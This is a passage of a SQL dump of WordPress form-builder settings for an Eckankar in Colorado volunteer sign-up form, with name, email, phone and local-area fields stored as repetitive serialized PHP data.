Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17402,614,'type','html','type','html'),(17401,614,'label','HTML','label','HTML'),(17400,614,'idAttribute','id','idAttribute','id'),(17399,614,'order','9','order','9'),(17398,614,'editActive','','editActive',''),(17397,613,'key','html_1663797539003','key','html_1663797539003'),(17396,613,'element_class','','element_class',''),(7325,256,'objectType','Field','objectType','Field'),(7326,256,'objectDomain','fields','objectDomain','fields'),(7327,256,'editActive','','editActive',''),(7328,256,'order','10','order','10'),(7329,256,'type','submit','type','submit'),(7330,256,'label','Submit','label','Submit'),(7331,256,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7332,256,'show_help','0','show_help','0'),(7333,256,'help_text','','help_text',''),(7334,256,'show_desc','0','show_desc','0'),(7335,256,'desc_pos','none','desc_pos','none'),(7336,256,'desc_text','','desc_text',''),(7337,256,'processing_label','Processing','processing_label','Processing'),(7338,256,'element_class','','element_class',''),(7339,256,'key','submit_200','key','submit_200'),(7340,256,'container_class','','container_class',''),(7341,256,'parent_id','23','parent_id','23'),(7342,257,'objectType','Field','objectType','Field'),(7343,257,'objectDomain','fields','objectDomain','fields'),(7344,257,'editActive','','editActive',''),(7345,257,'order','1','order','1'),(7346,257,'type','html','type','html'),(7347,257,'label','Text','label','Text'),(7348,257,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7349,257,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities Page</span></span></span></strong></span></h3>\r\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong>\r\n- Sri Harold Klemp, <em>Ask the Master, Book 2 </em>\r\n\r\nWe are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\r\n\r\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.\r\n\r\n<em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities Page</span></span></span></strong></span></h3>\r\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong>\r\n- Sri Harold Klemp, <em>Ask the Master, Book 2 </em>\r\n\r\nWe are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\r\n\r\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.\r\n\r\n<em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em>'),(7350,257,'desc_el','div','desc_el','div'),(7351,257,'show_desc','0','show_desc','0'),(7352,257,'desc_pos','none','desc_pos','none'),(7353,257,'desc_text','','desc_text',''),(7354,257,'element_class','','element_class',''),(7355,257,'default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities <br></span></span></span></strong></span></h3>\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong><br>- Sri Harold Klemp, <em>Ask the Master, Book 2</em></p><p>We are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\n\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.</p><p><em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em></p>','default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar in Colorado Volunteer Opportunities <br></span></span></span></strong></span></h3>\n<strong>\"One who gives of himself to life without any strings attached is a richer individual, because he is loving something more than himself...\"</strong><br>- Sri Harold Klemp, <em>Ask the Master, Book 2</em></p><p>We are always looking for Chelas who want to give service. Tasks or positions can be accepted to work within a group or by yourself as your interests and skills dictate.\n\nIf you are interested in any of the opportunities listed below, please use this form to let us know about your interests. Your selections will then be forwarded to the respective leaders in those areas.</p><p><em>Please note that for some positions, prior experience/training is needed e.g, to be an Arahata for a Satsang Class, prior Arahata training is needed. Some positions also require approval from within the ESC/RESA structure.</em></p>'),(7356,257,'key','html_220','key','html_220'),(7357,257,'container_class','','container_class',''),(7358,257,'parent_id','24','parent_id','24'),(7359,258,'objectType','Field','objectType','Field'),(7360,258,'objectDomain','fields','objectDomain','fields'),(7361,258,'editActive','','editActive',''),(7362,258,'order','2','order','2'),(7363,258,'type','textbox','type','textbox'),(7364,258,'def_id','6','def_id','6'),(7365,258,'label','First Name','label','First Name'),(7366,258,'label_pos','above','label_pos','above'),(7367,258,'mask','','mask',''),(7368,258,'datepicker','0','datepicker','0'),(7369,258,'first_name','1','first_name','1'),(7370,258,'last_name','0','last_name','0'),(7371,258,'from_name','0','from_name','0'),(7372,258,'user_info_field_group','1','user_info_field_group','1'),(7373,258,'show_help','0','show_help','0'),(7374,258,'help_text','','help_text',''),(7375,258,'calc_auto_include','0','calc_auto_include','0'),(7376,258,'calc_option','0','calc_option','0'),(7377,258,'placeholder','','placeholder',''),(7378,258,'user_address_1','','user_address_1',''),(7379,258,'user_address_2','','user_address_2',''),(7380,258,'user_city','','user_city',''),(7381,258,'user_zip','','user_zip',''),(7382,258,'user_phone','','user_phone',''),(7383,258,'user_email','','user_email',''),(7384,258,'disable_input','0','disable_input','0'),(7385,258,'input_limit','','input_limit',''),(7386,258,'input_limit_type','char','input_limit_type','char'),(7387,258,'input_limit_msg','','input_limit_msg',''),(7388,258,'user_state','0','user_state','0'),(7389,258,'autocomplete_off','0','autocomplete_off','0'),(7390,258,'num_sort','0','num_sort','0'),(7391,258,'admin_label','','admin_label',''),(7392,258,'user_info_field_group_name','','user_info_field_group_name',''),(7393,258,'user_info_field_group_custom','','user_info_field_group_custom',''),(7394,258,'show_desc','0','show_desc','0'),(7395,258,'desc_pos','none','desc_pos','none'),(7396,258,'desc_text','','desc_text',''),(7397,258,'element_class','','element_class',''),(7398,258,'required','1','required','1'),(7399,258,'key','textbox_221','key','textbox_221'),(7400,258,'default','','default',''),(7401,258,'container_class','one-half first','container_class','one-half first'),(7402,258,'manual_key','','manual_key',''),(7403,258,'custom_mask','','custom_mask',''),(7404,258,'parent_id','24','parent_id','24'),(7405,259,'objectType','Field','objectType','Field'),(7406,259,'objectDomain','fields','objectDomain','fields'),(7407,259,'editActive','','editActive',''),(7408,259,'order','3','order','3'),(7409,259,'type','lastname','type','lastname'),(7410,259,'def_id','7','def_id','7'),(7411,259,'label','Last Name','label','Last Name'),(7412,259,'label_pos','above','label_pos','above'),(7413,259,'mask','','mask',''),(7414,259,'datepicker','0','datepicker','0'),(7415,259,'first_name','0','first_name','0'),(7416,259,'from_name','0','from_name','0'),(7417,259,'user_info_field_group','1','user_info_field_group','1'),(7418,259,'show_help','0','show_help','0'),(7419,259,'help_text','','help_text',''),(7420,259,'calc_auto_include','0','calc_auto_include','0'),(7421,259,'calc_option','0','calc_option','0'),(7422,259,'placeholder','','placeholder',''),(7423,259,'user_address_1','','user_address_1',''),(7424,259,'user_address_2','','user_address_2',''),(7425,259,'user_city','','user_city',''),(7426,259,'user_zip','','user_zip',''),(7427,259,'user_phone','','user_phone',''),(7428,259,'user_email','','user_email',''),(7429,259,'disable_input','0','disable_input','0'),(7430,259,'input_limit','','input_limit',''),(7431,259,'input_limit_type','char','input_limit_type','char'),(7432,259,'input_limit_msg','','input_limit_msg',''),(7433,259,'user_state','0','user_state','0'),(7434,259,'autocomplete_off','0','autocomplete_off','0'),(7435,259,'num_sort','0','num_sort','0'),(7436,259,'admin_label','','admin_label',''),(7437,259,'user_info_field_group_name','','user_info_field_group_name',''),(7438,259,'user_info_field_group_custom','','user_info_field_group_custom',''),(7439,259,'show_desc','0','show_desc','0'),(7440,259,'desc_pos','none','desc_pos','none'),(7441,259,'desc_text','','desc_text',''),(7442,259,'element_class','','element_class',''),(7443,259,'required','1','required','1'),(7444,259,'key','lastname_222','key','lastname_222'),(7445,259,'default','','default',''),(7446,259,'container_class','one-half','container_class','one-half'),(7447,259,'parent_id','24','parent_id','24'),(7448,260,'objectType','Field','objectType','Field'),(7449,260,'objectDomain','fields','objectDomain','fields'),(7450,260,'editActive','','editActive',''),(7451,260,'order','4','order','4'),(7452,260,'type','email','type','email'),(7453,260,'def_id','14','def_id','14'),(7454,260,'label','Email','label','Email'),(7455,260,'label_pos','above','label_pos','above'),(7456,260,'mask','','mask',''),(7457,260,'datepicker','0','datepicker','0'),(7458,260,'first_name','0','first_name','0'),(7459,260,'last_name','0','last_name','0'),(7460,260,'from_name','0','from_name','0'),(7461,260,'user_address_1','0','user_address_1','0'),(7462,260,'user_address_2','0','user_address_2','0'),(7463,260,'user_city','0','user_city','0'),(7464,260,'user_zip','0','user_zip','0'),(7465,260,'user_phone','0','user_phone','0'),(7466,260,'user_info_field_group','1','user_info_field_group','1'),(7467,260,'show_help','0','show_help','0'),(7468,260,'help_text','','help_text',''),(7469,260,'calc_auto_include','0','calc_auto_include','0'),(7470,260,'calc_option','0','calc_option','0'),(7471,260,'placeholder','','placeholder',''),(7472,260,'disable_input','0','disable_input','0'),(7473,260,'input_limit','','input_limit',''),(7474,260,'input_limit_type','char','input_limit_type','char'),(7475,260,'input_limit_msg','','input_limit_msg',''),(7476,260,'user_state','0','user_state','0'),(7477,260,'autocomplete_off','0','autocomplete_off','0'),(7478,260,'num_sort','0','num_sort','0'),(7479,260,'admin_label','','admin_label',''),(7480,260,'user_info_field_group_name','','user_info_field_group_name',''),(7481,260,'user_info_field_group_custom','','user_info_field_group_custom',''),(7482,260,'show_desc','0','show_desc','0'),(7483,260,'desc_pos','none','desc_pos','none'),(7484,260,'desc_text','','desc_text',''),(7485,260,'element_class','','element_class',''),(7486,260,'required','1','required','1'),(7487,260,'key','email_223','key','email_223'),(7488,260,'default','','default',''),(7489,260,'container_class','one-half first','container_class','one-half first'),(7490,260,'parent_id','24','parent_id','24'),(7491,261,'objectType','Field','objectType','Field'),(7492,261,'objectDomain','fields','objectDomain','fields'),(7493,261,'editActive','','editActive',''),(7494,261,'order','5','order','5'),(7495,261,'type','phone','type','phone'),(7496,261,'def_id','15','def_id','15'),(7497,261,'label','Phone','label','Phone'),(7498,261,'label_pos','above','label_pos','above'),(7499,261,'mask','(999) 999-9999','mask','(999) 999-9999'),(7500,261,'datepicker','0','datepicker','0'),(7501,261,'first_name','0','first_name','0'),(7502,261,'last_name','0','last_name','0'),(7503,261,'from_name','0','from_name','0'),(7504,261,'user_address_1','0','user_address_1','0'),(7505,261,'user_address_2','0','user_address_2','0'),(7506,261,'user_city','0','user_city','0'),(7507,261,'user_zip','0','user_zip','0'),(7508,261,'user_email','0','user_email','0'),(7509,261,'user_info_field_group','1','user_info_field_group','1'),(7510,261,'show_help','0','show_help','0'),(7511,261,'help_text','','help_text',''),(7512,261,'calc_auto_include','0','calc_auto_include','0'),(7513,261,'calc_option','0','calc_option','0'),(7514,261,'placeholder','','placeholder',''),(7515,261,'disable_input','0','disable_input','0'),(7516,261,'input_limit','','input_limit',''),(7517,261,'input_limit_type','char','input_limit_type','char'),(7518,261,'input_limit_msg','','input_limit_msg',''),(7519,261,'user_state','0','user_state','0'),(7520,261,'autocomplete_off','0','autocomplete_off','0'),(7521,261,'num_sort','0','num_sort','0'),(7522,261,'admin_label','','admin_label',''),(7523,261,'user_info_field_group_name','','user_info_field_group_name',''),(7524,261,'user_info_field_group_custom','','user_info_field_group_custom',''),(7525,261,'show_desc','0','show_desc','0'),(7526,261,'desc_pos','none','desc_pos','none'),(7527,261,'desc_text','','desc_text',''),(7528,261,'element_class','','element_class',''),(7529,261,'required','1','required','1'),(7530,261,'key','phone_224','key','phone_224'),(7531,261,'default','','default',''),(7532,261,'container_class','one-half','container_class','one-half'),(7533,261,'manual_key','','manual_key',''),(7534,261,'custom_mask','','custom_mask',''),(7535,261,'parent_id','24','parent_id','24'),(7536,262,'objectType','Field','objectType','Field'),(7537,262,'objectDomain','fields','objectDomain','fields'),(7538,262,'editActive','','editActive',''),(7539,262,'order','6','order','6'),(7540,262,'type','listselect','type','listselect'),(7541,262,'label','Your Local Area','label','Your Local Area'),(7542,262,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7543,262,'label_pos','above','label_pos','above'),(7544,262,'list_type','dropdown','list_type','dropdown'),(7545,262,'multi_size','5','multi_size','5'),(7546,262,'list_show_value','1','list_show_value','1'),(7547,262,'list','a:0:{}','list','a:0:{}'),(7548,262,'user_info_field_group','','user_info_field_group',''),(7549,262,'calc_auto_include','0','calc_auto_include','0'),(7550,262,'user_state','0','user_state','0'),(7551,262,'num_sort','0','num_sort','0'),(7552,262,'admin_label','','admin_label',''),(7553,262,'show_help','0','show_help','0'),(7554,262,'help_text','','help_text',''),(7555,262,'show_desc','0','show_desc','0'),(7556,262,'desc_pos','none','desc_pos','none'),(7557,262,'desc_text','','desc_text',''),(7558,262,'element_class','','element_class',''),(7559,262,'required','1','required','1'),(7560,262,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 